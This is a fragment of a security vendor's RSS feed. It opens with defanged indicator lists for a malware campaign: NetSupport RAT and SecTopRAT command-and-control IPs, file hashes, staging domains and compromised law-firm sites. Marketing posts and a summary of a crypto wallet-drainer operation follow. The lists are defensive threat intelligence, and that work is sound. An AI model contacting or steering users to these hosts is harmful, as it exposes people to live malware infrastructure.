5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
0e9df9294c36702eee970efcb4a70b6ddb433190ab661273e2e559185c55b6c1
112bf17e7c0d0695e9229d60f0d2734c6b96d7edfb41ea3e98e518f4fb1ae6e9
11370e108c8e7a53e52f01df0829c8addb5833145618a7701fbedbb1d837a43d
15dfe9d443027ba01b8f54f415fd74d373b3a06017db8ef110fb55b33357b190
16c8b5e10135d168d73a553a4bda51628e5b4fd419c0ecd47ca4cd7aa864ebd5
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
1900ca9b482273df3127e221526023c025808d8fd65769a418fe1f346e7d41e2
1c389bf1859a00c58b6a97c02fc26c2fe9766c43e06242a94e92b6585b62398b
21a24922b29742977c4f7e25dd2be056dc02bc5e70c98e32ec3e0c6206f4d9ef
312a0e4db34a40cb95ba1fac8bf87deb45d0c5f048d38ac65eb060273b07df67
31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c
31f69d67eca6f3fc837e8d10dff4e2fb6643e33c118cff87df4fee2b183bf0e0
37e8b57ff4d724053b1917dc6edaca0708d44ceecd00cab7e4cabb336c2868d7
3ac57bea954ce68dc937f6954ae8a6a19a367a579aeeda7cc93ddd5968fae250
3ada20fbd80ec7f536db8303a5fa029af741a6914de61376ac8f81ac3ac728fd
3b5658532bc4058131689c5641def85d7ae25d5b837d3d1aff3af7bb25581f17
3c499faac4b973c237670f046973691a245ecd735ffebcca3e93337d94b71cde
3c4b87be8450e3120b7ad2b11ff59850950beb39906dc1636b3ee7b6390f2086
4732f025a2a69f6c40787854c5da122689702f00f4f423061bb30ab7fa1e98d3
5381b2a7a77448c4908f5c79d21631f56c88ead0365981cac1dcaafe493c313e
53e9511401000f61c9d910b92cd6d5a58e38ae541975135944885e53fa91ecb7
5dfbd8cf98ebd4977d4f240dcabd5cd67b936c0095c2d5b9a77896daea877df6
5eebdb584a1acd6aacc36c59c22ec51bbd077d2dbbe0890b52e62fa6fb9cf784
5ff742e134e3d17ec7abea435f718e8f5603b95e7984e024b2310ac9ef862ddf
60ff43424c0ba9dc259ab32405345ef325a4cb4d0baf0c0b0c13f9d3672e99eb
68c6411cc9afa68047641932530cf7201f17029167d4811375f1458cae32c7bd
6b2c41b42f75e64d435ba56c2f2b6d79a11b862a2d994487dab3e51e298bc5c9
6b93b7372941a09f1ea69f8b71c5c4e211ea0f8a24061e702002ca84457bcddd
6d0857a9c77f9c5f2a5e6921e1cb9f7e1a5d6b947ad63b364d291157d3f840fb
70f3a6fdbbc5e2ae79c28b48b6478ee3c8ea6f2b705ca9dc9bf8e63a4f6e0c8d
72baf2ecb0a9df607e54b64c0925ffc6739ab5a8b18900bf5c1930bcc799395d
748d546c6db44f6aa4bbb8e586d79f56c63fa87580eb19a0f2d5079cbe0952b7
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89
797ae2dbb2c538710fefe75dbe380b9f55b614cb03c4ae09bb3172e8234dd9d9
7a73ae8cca6ce6fa88f89d6154811cb453d6e6db9fa8ed5fbdaf8895aae601a5
7b19538dcf6d4bb84590c458f09c5707c8db53a42861fa56533c49c1a3acd953
7e3634bfd66e601d7585b237437f11f7d614b33705ba5f7bd75ab176c8250d38
858dfa529b960c6f6226b53beb55ba1900d3f498ba7be40724ed5c16d7d5a44b
871e5629d9c8898babf3ed579586e3f5f94a6c4623d3a0a7f9a99bf9d95ffc7b
8763749fd09245e7fa8c0ee2cc797d5520a9ef5d6846f044a0cd7c969c4bd7d4
89d839bbdc786c006304f3c6c6939150380aaa9e84d82bc31cdf0cf7609a6243
8b21fbd40c89763f51d5e06680c0971623500f4724c25958446bac794797057b
8baebd525324297faf86639266060172ded963767c832a609a991fa92c8463ab
8d1ed904d90e08048f42cdc9a25c2159f0f8dc4aa9dc01b0207645ea53abe189
957ab8417606ad41ad31f006d997af3f647dd5215af899551d08b3b472a4bc85
a0332fe0baa316fe793e757f9cf5938b099e97dc4624ead6f3bad8555c8a419b
a1482e62ecc89696a75adea7052c2e98a75c9d37304723abd110d60962bafdb7
a28d0c82a2a37462c2975b5eda7f91e8fc3c2ed50abfe357948ec4faabbd4951
a6637685091835826e62af279cc6c648188797f9edc05a2399a6686349102774
a6f1f68827303e655488c8d54b3be3ce8b1097f3ff374a2e4bc82ff96812781c
abc5b2118bc1d8c82f3726a5e30cf22ae3fa1c572dd3327b281ea6fd97ae9c06
afc45cc0df7f7e481bff45c6f62a6418b6ae4c8b474ec36113e05ab7ca7e2743
b1f91355a8472e364e07f05dc69bbd9c74dc1943e9c4475f46c2b448bb6d6e5d
b2b7218c3f649b9077510aac309357e884c314e0f488abed391415defb249f4c
b6b685fe020c481161060df9dbef0fc205cde479056c18aaeae184daa3f8a9c0
b784301cb2edafea875f779cf24e018f06732561069f6c4c3d86548029671642
ba557bd6b2c1d3297b2c9bd7294e47b9ad9ec6a937cddc879dd563c61a9abcbd
bb451151e52f0868f98e32d26ffa7c2be412b47cd470bf90d3cfe777b4a19f85
bd39f32177dc7a20f5087c5460ebf589035d9051336c69f07a26398f76aec40e
bf37542e9eb7a3b2f51d107e56d7551e6248f06ce18918e3dda2ebe9da1b0e80
bf97c4ff35b5e2c039aa1f1a9a164b7ec4d9339a631c84910b9a4d03b7927b8a
c2ba0018de8dcf0abfb2669cce95ed09377e9a9da7ff8e74e95688c99a025634
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
c441afb337c4803eed20ae255fbad3cdfac2800475c51e00a55369909efb4c89
cc6ad344d30178e04e49ab16cd43744925676562aded051835fb3f73401f31fa
ceab18331f785d0bf215f551b90f00567e36d339ba8e3ed8e45c0ad410b25808
d02a1eb597c66b602ac7d55095f771345ff5e90905ea12e523df2095030752b6
d6142f48664208710bab9fcab8dfcda66ad75ad756d2ce9c3aa243dcbc29bf4a
d665a8547baf067f2216821ecd4145eab1c75868f024d09140fb265b819d5194
d8d2092e174240d7bac63a9e1c199b442e1cb0f39d7fa32510b1aa7717c3ae38
e24de02415946133176b66017d54a5dcd7270c83f5ef01d79faff4e64d13c63b
e5502722c2bb84876903549445534c47cdaa586a0bb1e5b3a53162d75cc6cb28
e66ae0ac443b5140a1b35b5aaa6899eea296d9d633988eb044a395a34a887431
e92e01977d85f6834f57bd09e29e654b10da798844e4a64470cb22dac78bef93
e9723a2a9ca45787c35b864605a6be71ccf12b2d96dad8e7fc39117f7ba29abb
f28bb7bc5c801d5444ba6816e3a91d5bfaf0307578b7a1529415fc220fd9e9e8
f86b6aa11a276c24dd80db48f43c8a2f0c8df6e5426a7a0fee322c0427421ebb

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com
</code></pre>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_187b8e348054a7063fd37aec148dfc3337efc5d14.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Network Intelligence: Your Questions, Global Answers]]></title>
            <link>https://www.recordedfuture.com/blog/network-intelligence-questions-answered</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/network-intelligence-questions-answered</guid>
            <pubDate>Mon, 16 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how network intelligence gives security teams control over threat investigation with global visibility—no more drowning in generic, passive threat feeds.]]></description>
            <content:encoded><![CDATA[
        <h2>The Problem with Pre-Packaged Intelligence</h2>
        <p>Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.</p>
        <p>The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.</p>
        <p>Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.</p>
        <h2>What Network Intelligence Actually Means</h2>
        <p>Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.</p>
        <p>At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.</p>
        <h2>What This Means in Practice</h2>
        <p>Consider what changes when your security operations can query global network intelligence.</p>
        <p><strong>Faster SOC Triage</strong></p>
        <p>Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.</p>
        <p><strong>Targeted or Opportunistic? Now You'll Know</strong></p>
        <p>When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.</p>
        <p><strong>Fraud Infrastructure Exposed</strong></p>
        <p>Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.</p>
        <p><strong>Attribution That Actually Holds Up</strong></p>
        <p>Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.</p>
        <h2>Integration Into Security Workflows</h2>
        <p>Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.</p>
        <h2>When Expertise Becomes Essential</h2>
        <p>For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.</p>
        <p>Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.</p>
        <h2>The Compliance Framework That Enables Trust</h2>
        <p>Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.</p>
        <p>These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.</p>
        <h2>Moving Forward</h2>
        <p>The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.</p>
        <p>Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.</p>
        <p>What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_188ef07891988f2f97aad055a1f5a7c089fb55765.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[State of Security Report | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/research/state-of-security</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/state-of-security</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Download Recorded Future's 2026 State of Security report which provides comprehensive threat intelligence on geopolitical fragmentation, state-sponsored operations, ransomware evolution, and emerging technology risk.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Fragmentation is the new normal</h2>
              <p>The global threat landscape didn't simplify in 2025—it shattered. Geopolitical alliances strained. Criminal enterprises splintered and regrouped. State-sponsored actors shifted from dramatic disruptions to quiet pre-positioning. And as long-established norms unwound, convergence across once-distinct domains created unprecedented uncertainty.</p>
              <p>The 2026 State of Security report delivers Insikt Group's most comprehensive annual analysis of the forces shaping global security—helping leaders reduce surprise, prioritize effectively, and act with confidence.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_188a8fbb5001e358d9837adb14d5fb0897434527c.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Fragmentation Defined 2025's Threat Landscape. Here's What It Means for 2026]]></title>
            <link>https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The global threat landscape didn't simplify in 2025 — it shattered. The 2026 State of Security report represents Insikt Group's most comprehensive threat intelligence analysis to date, drawing on proprietary intelligence, network telemetry, and deep geopolitical research to help you stay ahead of converging threats.]]></description>
            <content:encoded><![CDATA[
        <p>Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.</p>
        <p>The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.</p>
        <p>But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.</p>
        <p>Today, Recorded Future's Insikt Group releases the <strong><a href="https://www.recordedfuture.com/research/state-of-security">2026 State of Security</a></strong> report, our most comprehensive annual analysis of the forces shaping global security.</p>
        <p>Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.</p>
        <h2>The End of Stability as a Baseline Assumption</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10c922a3a2103e396f22a400e3135d81ce6b0f02b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1220" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>2025 redefined international relations (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14120f6481cb46917d75b8ece722dda331953c861.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From 27 Steps to 5: How Recorded Future Reimagined Threat Hunting with Autonomous Threat Operations]]></title>
            <link>https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</guid>
            <pubDate>Wed, 11 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Autonomous Threat Operations reduces 27 manual steps to as few as 5 largely automated ones, delivering the speed, scale, and effectiveness that the modern threat landscape demands.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>The manual operations gap can be a business risk</li>
                <li>Manual threat hunting requires 27 steps that burn analyst time</li>
                <li>Autonomous Threat Operations can reduce 27 steps to 5</li>
                <li>Autonomous operations prove measurable ROI</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Rublevka Team: Anatomy of a Russian Crypto Drainer Operation]]></title>
            <link>https://www.recordedfuture.com/research/rublevka-team-anatomy-russian-crypto-drainer-operation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/rublevka-team-anatomy-russian-crypto-drainer-operation</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.</p>
        <p>This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.</li>
          <li>As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.</li>
          <li>Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.</li>
          <li>The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.</li>
          <li>The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1f21796732ee17098dc9eae5148e093dc47d7f9de.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</guid>
            <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent threat hunting into unified, automated operations—enabling junior analysts to run 15–20 hunts weekly and allowing our CISO to launch comprehensive network hunts in five minutes in response to critical threats like Salt Typhoon. By understanding these outcomes, security leaders can see how autonomous threat hunting empowers teams at every skill level to shift from reactive to proactive defense.]]></description>
